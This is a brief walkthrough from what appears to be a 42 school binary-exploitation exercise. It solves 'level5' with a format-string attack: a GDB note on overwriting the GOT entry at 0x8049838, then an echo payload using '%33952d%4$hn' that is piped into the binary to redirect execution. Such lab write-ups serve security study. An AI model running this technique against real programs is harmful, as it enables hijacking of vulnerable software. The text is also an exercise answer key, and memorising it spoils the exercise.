# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/04 18:52:22 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/04 18:52:59 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #

//set *(unsigned char*)(0x8049838) = (0x80484a4)
x/x 0x8049838:	0x080483d6

echo -e "\x38\x98\x04\x08%33952d%4\$hn" > /tmp/t
cat /tmp/t - | ./level5